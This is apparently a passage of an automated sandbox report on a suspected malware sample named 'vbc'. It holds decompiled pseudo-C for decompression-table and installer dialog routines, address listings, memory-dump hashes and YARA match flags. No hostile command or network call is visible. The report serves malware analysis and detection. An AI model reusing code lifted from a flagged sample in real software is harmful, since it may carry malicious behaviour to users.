                                                						_t168 = 0;
                                                						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                							break;
                                                						}
                                                						_t190 = _t190 + 1;
                                                						if(_t190 <= _t234) {
                                                							continue;
                                                						}
                                                						break;
                                                					}
                                                					_v8 = _t190;
                                                					if(_t267 < _t190) {
                                                						_a28 = _t190;
                                                					}
                                                					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                						_t234 = _t234 - 1;
                                                						if(_t234 != 0) {
                                                							continue;
                                                						}
                                                						break;
                                                					}
                                                					_v28 = _t234;
                                                					if(_a28 > _t234) {
                                                						_a28 = _t234;
                                                					}
                                                					 *_t279 = _a28;
                                                					_t181 = 1 << _t190;
                                                					while(_t190 < _t234) {
                                                						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                						if(_t182 < 0) {
                                                							L64:
                                                							return _t168 | 0xffffffff;
                                                						}
                                                						_t190 = _t190 + 1;
                                                						_t181 = _t182 + _t182;
                                                					}
                                                					_t281 = _t234 << 2;
                                                					_t191 = _t299 + _t281 - 0x70;
                                                					_t269 =  *_t191;
                                                					_t183 = _t181 - _t269;
                                                					_v52 = _t183;
                                                					if(_t183 < 0) {
                                                						goto L64;
                                                					}
                                                					_v176 = _t168;
                                                					 *_t191 = _t269 + _t183;
                                                					_t192 = 0;
                                                					_t235 = _t234 - 1;
                                                					if(_t235 == 0) {
                                                						L21:
                                                						_t184 = _a4;
                                                						_t271 = 0;
                                                						do {
                                                							_t193 =  *_t184;
                                                							_t184 =  &(_t184[1]);
                                                							if(_t193 != _t168) {
                                                								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                								_t236 =  *_t232;
                                                								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                								 *_t232 = _t236 + 1;
                                                							}
                                                							_t271 = _t271 + 1;
                                                						} while (_t271 < _a8);
                                                						_v16 = _v16 | 0xffffffff;
                                                						_v40 = _v40 & 0x00000000;
                                                						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                						_t195 = _v8;
                                                						_t186 =  ~_a28;
                                                						_v12 = _t168;
                                                						_v180 = _t168;
                                                						_v36 = 0x432190;
                                                						_v240 = _t168;
                                                						if(_t195 > _v28) {
                                                							L62:
                                                							_t168 = 0;
                                                							if(_v52 == 0 || _v28 == 1) {
                                                								return _t168;
                                                							} else {
                                                								goto L64;
                                                							}
                                                						}
                                                						_v44 = _t195 - 1;
                                                						_v32 = _t299 + _t195 * 4 - 0x70;
                                                						do {
                                                							_t282 =  *_v32;
                                                							if(_t282 == 0) {
                                                								goto L61;
                                                							}
                                                							while(1) {
                                                								_t283 = _t282 - 1;
                                                								_t200 = _a28 + _t186;
                                                								_v48 = _t283;
                                                								_v24 = _t200;
                                                								if(_v8 <= _t200) {
                                                									goto L45;
                                                								}
                                                								L31:
                                                								_v20 = _t283 + 1;
                                                								do {
                                                									_v16 = _v16 + 1;
                                                									_t296 = _v28 - _v24;
                                                									if(_t296 > _a28) {
                                                										_t296 = _a28;
                                                									}
                                                									_t222 = _v8 - _v24;
                                                									_t254 = 1 << _t222;
                                                									if(1 <= _v20) {
                                                										L40:
                                                										_t256 =  *_a36;
                                                										_t168 = 1 << _t222;
                                                										_v40 = 1;
                                                										_t274 = _t256 + 1;
                                                										if(_t274 > 0x5a0) {
                                                											goto L64;
                                                										}
                                                									} else {
                                                										_t275 = _v32;
                                                										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                										if(_t222 >= _t296) {
                                                											goto L40;
                                                										}
                                                										while(1) {
                                                											_t222 = _t222 + 1;
                                                											if(_t222 >= _t296) {
                                                												goto L40;
                                                											}
                                                											_t275 = _t275 + 4;
                                                											_t264 = _t263 + _t263;
                                                											_t175 =  *_t275;
                                                											if(_t264 <= _t175) {
                                                												goto L40;
                                                											}
                                                											_t263 = _t264 - _t175;
                                                										}
                                                										goto L40;
                                                									}
                                                									_t168 = _a32 + _t256 * 4;
                                                									_t297 = _t299 + _v16 * 4 - 0xec;
                                                									 *_a36 = _t274;
                                                									_t259 = _v16;
                                                									 *_t297 = _t168;
                                                									if(_t259 == 0) {
                                                										 *_a24 = _t168;
                                                									} else {
                                                										_t276 = _v12;
                                                										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                										_a5 = _a28;
                                                										_a4 = _t222;
                                                										_t262 = _t276 >> _t186;
                                                										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                										 *(_t298 + _t262 * 4) = _a4;
                                                									}
                                                									_t224 = _v24;
                                                									_t186 = _t224;
                                                									_t225 = _t224 + _a28;
                                                									_v24 = _t225;
                                                								} while (_v8 > _t225);
                                                								L45:
                                                								_t284 = _v36;
                                                								_a5 = _v8 - _t186;
                                                								if(_t284 < 0x432190 + _a8 * 4) {
                                                									_t205 =  *_t284;
                                                									if(_t205 >= _a12) {
                                                										_t207 = _t205 - _a12 + _t205 - _a12;
                                                										_v36 =  &(_v36[1]);
                                                										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                									} else {
                                                										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                										_t208 =  *_t284;
                                                										_v36 =  &(_t284[1]);
                                                									}
                                                									_a6 = _t208;
                                                								} else {
                                                									_a4 = 0xc0;
                                                								}
                                                								_t286 = 1 << _v8 - _t186;
                                                								_t244 = _v12 >> _t186;
                                                								while(_t244 < _v40) {
                                                									 *(_t168 + _t244 * 4) = _a4;
                                                									_t244 = _t244 + _t286;
                                                								}
                                                								_t287 = _v12;
                                                								_t246 = 1 << _v44;
                                                								while((_t287 & _t246) != 0) {
                                                									_t287 = _t287 ^ _t246;
                                                									_t246 = _t246 >> 1;
                                                								}
                                                								_t288 = _t287 ^ _t246;
                                                								_v20 = 1;
                                                								_v12 = _t288;
                                                								_t251 = _v16;
                                                								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                									L60:
                                                									if(_v48 != 0) {
                                                										_t282 = _v48;
                                                										_t283 = _t282 - 1;
                                                										_t200 = _a28 + _t186;
                                                										_v48 = _t283;
                                                										_v24 = _t200;
                                                										if(_v8 <= _t200) {
                                                											goto L45;
                                                										}
                                                										goto L31;
                                                									}
                                                									break;
                                                								} else {
                                                									goto L58;
                                                								}
                                                								do {
                                                									L58:
                                                									_t186 = _t186 - _a28;
                                                									_t251 = _t251 - 1;
                                                								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                								_v16 = _t251;
                                                								goto L60;
                                                							}
                                                							L61:
                                                							_v8 = _v8 + 1;
                                                							_v32 = _v32 + 4;
                                                							_v44 = _v44 + 1;
                                                						} while (_v8 <= _v28);
                                                						goto L62;
                                                					}
                                                					_t277 = 0;
                                                					do {
                                                						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                						_t277 = _t277 + 4;
                                                						_t235 = _t235 - 1;
                                                						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                					} while (_t235 != 0);
                                                					goto L21;
                                                				}
                                                				 *_a24 =  *_a24 & 0x00000000;
                                                				 *_a28 =  *_a28 & 0x00000000;
                                                				return 0;
                                                			}











































































                                                0x00407567
                                                0x0040756f
                                                0x00407573
                                                0x00407575
                                                0x00407578
                                                0x0040757a
                                                0x0040757a
                                                0x0040757c
                                                0x00407583
                                                0x00407585
                                                0x00407585
                                                0x0040758b
                                                0x004075a0
                                                0x004075a8
                                                0x004075aa
                                                0x004075ac
                                                0x004075af
                                                0x004075b0
                                                0x004075b0
                                                0x004075b6
                                                0x00000000
                                                0x00000000
                                                0x004075b8
                                                0x004075bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004075bb
                                                0x004075bf
                                                0x004075c2
                                                0x004075c4
                                                0x004075c4
                                                0x004075c7
                                                0x004075cd
                                                0x004075ce
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004075ce
                                                0x004075d3
                                                0x004075d6
                                                0x004075d8
                                                0x004075d8
                                                0x004075de
                                                0x004075e0
                                                0x004075f1
                                                0x004075e4
                                                0x004075e8
                                                0x0040788d
                                                0x00000000
                                                0x0040788d
                                                0x004075ee
                                                0x004075ef
                                                0x004075ef
                                                0x004075f7
                                                0x004075fa
                                                0x004075fe
                                                0x00407600
                                                0x00407602
                                                0x00407605
                                                0x00000000
                                                0x00000000
                                                0x0040760d
                                                0x00407613
                                                0x00407615
                                                0x00407617
                                                0x00407618
                                                0x0040762d
                                                0x0040762d
                                                0x00407630
                                                0x00407632
                                                0x00407632
                                                0x00407634
                                                0x00407639
                                                0x0040763b
                                                0x00407642
                                                0x00407644
                                                0x0040764c
                                                0x0040764c
                                                0x0040764e
                                                0x0040764f
                                                0x0040765e
                                                0x00407662
                                                0x00407666
                                                0x00407669
                                                0x0040766c
                                                0x00407671
                                                0x00407674
                                                0x0040767a
                                                0x00407681
                                                0x00407687
                                                0x00407880
                                                0x00407880
                                                0x00407885
                                                0x00407894
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407885
                                                0x00407694
                                                0x00407697
                                                0x0040769a
                                                0x0040769d
                                                0x004076a1
                                                0x00000000
                                                0x00000000
                                                0x004076ac
                                                0x004076af
                                                0x004076b0
                                                0x004076b2
                                                0x004076b8
                                                0x004076bb
                                                0x00000000
                                                0x00000000
                                                0x004076c1
                                                0x004076c2
                                                0x004076c5
                                                0x004076c8
                                                0x004076cb
                                                0x004076d1
                                                0x004076d3
                                                0x004076d3
                                                0x004076db
                                                0x004076df
                                                0x004076e4
                                                0x00407709
                                                0x0040770f
                                                0x00407711
                                                0x00407713
                                                0x00407716
                                                0x0040771f
                                                0x00000000
                                                0x00000000
                                                0x004076e6
                                                0x004076e6
                                                0x004076ef
                                                0x004076f3
                                                0x00000000
                                                0x00000000
                                                0x00407704
                                                0x00407704
                                                0x00407707
                                                0x00000000
                                                0x00000000
                                                0x004076f7
                                                0x004076fa
                                                0x004076fc
                                                0x00407700
                                                0x00000000
                                                0x00000000
                                                0x00407702
                                                0x00407702
                                                0x00000000
                                                0x00407704
                                                0x00407728
                                                0x0040772e
                                                0x00407738
                                                0x0040773a
                                                0x0040773f
                                                0x00407741
                                                0x00407777
                                                0x00407743
                                                0x00407743
                                                0x00407746
                                                0x00407749
                                                0x00407753
                                                0x00407756
                                                0x0040775d
                                                0x00407768
                                                0x0040776f
                                                0x0040776f
                                                0x00407779
                                                0x0040777c
                                                0x0040777e
                                                0x00407784
                                                0x00407784
                                                0x0040778d
                                                0x00407790
                                                0x00407795
                                                0x004077a4
                                                0x004077ac
                                                0x004077b1
                                                0x004077d5
                                                0x004077dd
                                                0x004077e1
                                                0x004077e7
                                                0x004077b3
                                                0x004077c1
                                                0x004077c4
                                                0x004077ca
                                                0x004077ca
                                                0x004077eb
                                                0x004077a6
                                                0x004077a6
                                                0x004077a6
                                                0x004077fc
                                                0x00407800
                                                0x0040780c
                                                0x00407807
                                                0x0040780a
                                                0x0040780a
                                                0x00407814
                                                0x00407819
                                                0x00407821
                                                0x0040781d
                                                0x0040781f
                                                0x0040781f
                                                0x00407827
                                                0x00407829
                                                0x00407830
                                                0x0040783a
                                                0x00407844
                                                0x00407860
                                                0x00407864
                                                0x004076a9
                                                0x004076af
                                                0x004076b0
                                                0x004076b2
                                                0x004076b8
                                                0x004076bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004076bb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407846
                                                0x00407846
                                                0x00407846
                                                0x0040784b
                                                0x00407854
                                                0x0040785d
                                                0x00000000
                                                0x0040785d
                                                0x0040786a
                                                0x0040786a
                                                0x0040786d
                                                0x00407874
                                                0x00407877
                                                0x00000000
                                                0x0040769a
                                                0x0040761a
                                                0x0040761c
                                                0x0040761c
                                                0x00407620
                                                0x00407623
                                                0x00407624
                                                0x00407624
                                                0x00000000
                                                0x0040761c
                                                0x00407590
                                                0x00407596
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5c7b0e71fa35c9b4742bed50b9bf2216787e54fa83ad13d5e25ce4f83c8cfaff
                                                • Instruction ID: a012413e0ef0fd2f422d01a36ea3d9923c127a94b2398be22421b68f44052b32
                                                • Opcode Fuzzy Hash: 5c7b0e71fa35c9b4742bed50b9bf2216787e54fa83ad13d5e25ce4f83c8cfaff
                                                • Instruction Fuzzy Hash: 3561B171604389DFCB34DF6AC9A07EB76E1AF19740F44452EDA4E9BB40C731AA41CB12
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 02c9fe33d51f2d4566d5abd6eb86c8f89cfa6d3e62bc0b7d1525171c8b3a1a3f
                                                • Instruction ID: fa7985f5ddaf702976c6b71aaf8a13a4c3dc5fe0dac3b19675c50a40bc6a91db
                                                • Opcode Fuzzy Hash: 02c9fe33d51f2d4566d5abd6eb86c8f89cfa6d3e62bc0b7d1525171c8b3a1a3f
                                                • Instruction Fuzzy Hash: 494125351087C24FCB21CFB888896D9BFA0AF06364F1D87DDCAA44B697E3364146C752
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 07674c675fbb4391a6665858390a9c4eb80830fcd0cc632bd5e3a9e7e6729f8c
                                                • Instruction ID: 1211504b73e58e3ee258e1b31d29ba77ec819e0fe936307bf4a4667e5180199e
                                                • Opcode Fuzzy Hash: 07674c675fbb4391a6665858390a9c4eb80830fcd0cc632bd5e3a9e7e6729f8c
                                                • Instruction Fuzzy Hash: A14138709083C58FDF39DF3489A47FA77A2AF52320F0981BECD9A4E285D2354641C716
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d579cd20bbed0f106c054fd91fef55ede422a288c979c5b0fe6e066c77e81a72
                                                • Instruction ID: 614b610d76a252a2abe87c4e83fb39ed1877569e62204b0c9b141bebd5946650
                                                • Opcode Fuzzy Hash: d579cd20bbed0f106c054fd91fef55ede422a288c979c5b0fe6e066c77e81a72
                                                • Instruction Fuzzy Hash: 1E4127752057459FCB39DF16CAB16FBB3A6AF49700F44061ECA8A0FB90CB316A80CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4877339a5af519df90ca74a1c1479da8766a7b8dcc73ca5d23638ffd8264dadd
                                                • Instruction ID: 2351e2d99ce6043aea0ef274e155bc6b1f0760cbf31755e63bded4043b2b33e1
                                                • Opcode Fuzzy Hash: 4877339a5af519df90ca74a1c1479da8766a7b8dcc73ca5d23638ffd8264dadd
                                                • Instruction Fuzzy Hash: C44116711047859FCB35CF16CAB16FB77A1AF45740F94061ECA4A4BB90CB316A81CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f20020a4844c201d32b14be27e4dac6ad05c1b29799e436adca55ece17740e7
                                                • Instruction ID: d806d447ffd051e267fbd024228fecd5f083558a98f76f5d88adc12cad1a341e
                                                • Opcode Fuzzy Hash: 8f20020a4844c201d32b14be27e4dac6ad05c1b29799e436adca55ece17740e7
                                                • Instruction Fuzzy Hash: EF21C33470934ACFCB349E39C9D47DAB3A2BF5A740F99426DD949CB302E3705846C641
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6ee73820f13b5c8972330a15696398dc197690878cdb433548affbb82c66a9e
                                                • Instruction ID: 53d7c407637f93f6cc606c63bbb85025b5e21aa6705cedf6e14812c92a4c6141
                                                • Opcode Fuzzy Hash: c6ee73820f13b5c8972330a15696398dc197690878cdb433548affbb82c66a9e
                                                • Instruction Fuzzy Hash: 3B11B673459244DFDBA8AF348C49AEBBBF6AF91350F13452EEC8A5B610D33159418B42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6da38b038068966dd311a5abf458b3d1a3ce38343e96beb06c82a659ca4f5601
                                                • Instruction ID: 2f85c676666cb6d5a0cb09870b48c4bc63fb20c0fd8a829cf64f1af889eeecee
                                                • Opcode Fuzzy Hash: 6da38b038068966dd311a5abf458b3d1a3ce38343e96beb06c82a659ca4f5601
                                                • Instruction Fuzzy Hash: 37C08C5B1582110D0AE2207C320055B24029FC3850715CA6C5A0BAA108E9C0CC8C208A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
                                                • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8e4915d1f00ad8f7450ea74e2b6b53dd5db9d11ec3cbd9bd37e991852c677831
                                                • Instruction ID: adfcd750ae3c432ca888a39a44e0875da1d7e24ab2f7088286a892864631ebf3
                                                • Opcode Fuzzy Hash: 8e4915d1f00ad8f7450ea74e2b6b53dd5db9d11ec3cbd9bd37e991852c677831
                                                • Instruction Fuzzy Hash: C0B00275651640CFCE56CF59C194F4173B4FF58750F4254D4E8118BB11C264E900CE50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                				struct HWND__* _v8;
                                                				struct HWND__* _v12;
                                                				long _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				intOrPtr _v28;
                                                				signed char* _v32;
                                                				int _v36;
                                                				signed int _v44;
                                                				int _v48;
                                                				signed int* _v60;
                                                				signed char* _v64;
                                                				signed int _v68;
                                                				long _v72;
                                                				void* _v76;
                                                				intOrPtr _v80;
                                                				intOrPtr _v84;
                                                				void* _v88;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t198;
                                                				intOrPtr _t201;
                                                				long _t207;
                                                				signed int _t211;
                                                				signed int _t222;
                                                				void* _t225;
                                                				void* _t226;
                                                				int _t232;
                                                				long _t237;
                                                				long _t238;
                                                				signed int _t239;
                                                				signed int _t245;
                                                				signed int _t247;
                                                				signed char _t248;
                                                				signed char _t254;
                                                				void* _t258;
                                                				void* _t260;
                                                				signed char* _t278;
                                                				signed char _t279;
                                                				long _t284;
                                                				struct HWND__* _t291;
                                                				signed int* _t292;
                                                				int _t293;
                                                				long _t294;
                                                				signed int _t295;
                                                				void* _t297;
                                                				long _t298;
                                                				int _t299;
                                                				signed int _t300;
                                                				signed int _t303;
                                                				signed int _t311;
                                                				signed char* _t319;
                                                				int _t324;
                                                				void* _t326;
                                                
                                                				_t291 = _a4;
                                                				_v12 = GetDlgItem(_t291, 0x3f9);
                                                				_v8 = GetDlgItem(_t291, 0x408);
                                                				_t326 = SendMessageW;
                                                				_v24 =  *0x434f28;
                                                				_v28 =  *0x434f10 + 0x94;
                                                				if(_a8 != 0x110) {
                                                					L23:
                                                					if(_a8 != 0x405) {
                                                						_t301 = _a16;
                                                					} else {
                                                						_a12 = 0;
                                                						_t301 = 1;
                                                						_a8 = 0x40f;
                                                						_a16 = 1;
                                                					}
                                                					if(_a8 == 0x4e || _a8 == 0x413) {
                                                						_v16 = _t301;
                                                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                							if(( *0x434f19 & 0x00000002) != 0) {
                                                								L41:
                                                								if(_v16 != 0) {
                                                									_t237 = _v16;
                                                									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                									}
                                                									_t238 = _v16;
                                                									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                										_t301 = _v24;
                                                										_t239 =  *(_t238 + 0x5c);
                                                										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                										} else {
                                                											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                										}
                                                									}
                                                								}
                                                								goto L48;
                                                							}
                                                							if(_a8 == 0x413) {
                                                								L33:
                                                								_t301 = 0 | _a8 != 0x00000413;
                                                								_t245 = E00404E54(_v8, _a8 != 0x413);
                                                								_t295 = _t245;
                                                								if(_t295 >= 0) {
                                                									_t94 = _v24 + 8; // 0x8
                                                									_t301 = _t245 * 0x818 + _t94;
                                                									_t247 =  *_t301;
                                                									if((_t247 & 0x00000010) == 0) {
                                                										if((_t247 & 0x00000040) == 0) {
                                                											_t248 = _t247 ^ 0x00000001;
                                                										} else {
                                                											_t254 = _t247 ^ 0x00000080;
                                                											if(_t254 >= 0) {
                                                												_t248 = _t254 & 0x000000fe;
                                                											} else {
                                                												_t248 = _t254 | 0x00000001;
                                                											}
                                                										}
                                                										 *_t301 = _t248;
                                                										E0040117D(_t295);
                                                										_a12 = _t295 + 1;
                                                										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                                										_a8 = 0x40f;
                                                									}
                                                								}
                                                								goto L41;
                                                							}
                                                							_t301 = _a16;
                                                							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                								goto L41;
                                                							}
                                                							goto L33;
                                                						} else {
                                                							goto L48;
                                                						}
                                                					} else {
                                                						L48:
                                                						if(_a8 != 0x111) {
                                                							L56:
                                                							if(_a8 == 0x200) {
                                                								SendMessageW(_v8, 0x200, 0, 0);
                                                							}
                                                							if(_a8 == 0x40b) {
                                                								_t225 =  *0x42d24c;
                                                								if(_t225 != 0) {
                                                									ImageList_Destroy(_t225);
                                                								}
                                                								_t226 =  *0x42d260;
                                                								if(_t226 != 0) {
                                                									GlobalFree(_t226);
                                                								}
                                                								 *0x42d24c = 0;
                                                								 *0x42d260 = 0;
                                                								 *0x434f60 = 0;
                                                							}
                                                							if(_a8 != 0x40f) {
                                                								L90:
                                                								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                                									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                									ShowWindow(_v8, _t324);
                                                									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                								}
                                                								goto L93;
                                                							} else {
                                                								E004011EF(_t301, 0, 0);
                                                								_t198 = _a12;
                                                								if(_t198 != 0) {
                                                									if(_t198 != 0xffffffff) {
                                                										_t198 = _t198 - 1;
                                                									}
                                                									_push(_t198);
                                                									_push(8);
                                                									E00404ED4();
                                                								}
                                                								if(_a16 == 0) {
                                                									L75:
                                                									E004011EF(_t301, 0, 0);
                                                									_v36 =  *0x42d260;
                                                									_t201 =  *0x434f28;
                                                									_v64 = 0xf030;
                                                									_v24 = 0;
                                                									if( *0x434f2c <= 0) {
                                                										L86:
                                                										if( *0x434fbe == 0x400) {
                                                											InvalidateRect(_v8, 0, 1);
                                                										}
                                                										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
                                                											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                                										}
                                                										goto L90;
                                                									}
                                                									_t292 = _t201 + 8;
                                                									do {
                                                										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                										if(_t207 != 0) {
                                                											_t303 =  *_t292;
                                                											_v72 = _t207;
                                                											_v76 = 8;
                                                											if((_t303 & 0x00000001) != 0) {
                                                												_v76 = 9;
                                                												_v60 =  &(_t292[4]);
                                                												_t292[0] = _t292[0] & 0x000000fe;
                                                											}
                                                											if((_t303 & 0x00000040) == 0) {
                                                												_t211 = (_t303 & 0x00000001) + 1;
                                                												if((_t303 & 0x00000010) != 0) {
                                                													_t211 = _t211 + 3;
                                                												}
                                                											} else {
                                                												_t211 = 3;
                                                											}
                                                											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                										}
                                                										_v24 = _v24 + 1;
                                                										_t292 =  &(_t292[0x206]);
                                                									} while (_v24 <  *0x434f2c);
                                                									goto L86;
                                                								} else {
